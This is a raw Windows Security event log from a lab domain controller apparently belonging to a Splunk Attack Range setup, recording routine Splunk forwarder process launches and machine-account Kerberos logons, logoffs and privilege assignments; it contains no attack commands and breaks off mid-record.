Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264402
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264403
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1360
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264404
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264406
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1794
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264405
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264407
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x802586
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264410
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x805E30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264409
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x805E30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62608
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264408
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x805E30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264412
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x806035
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62611
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264411
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x806035
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264413
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x806035
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264415
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x7b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264414
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264416
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264417
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264418
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x141c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264420
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264419
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x498
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264423
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x809B13
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264422
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x809B13
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62625
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264421
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x809B13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264425
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a40
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264424
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f4
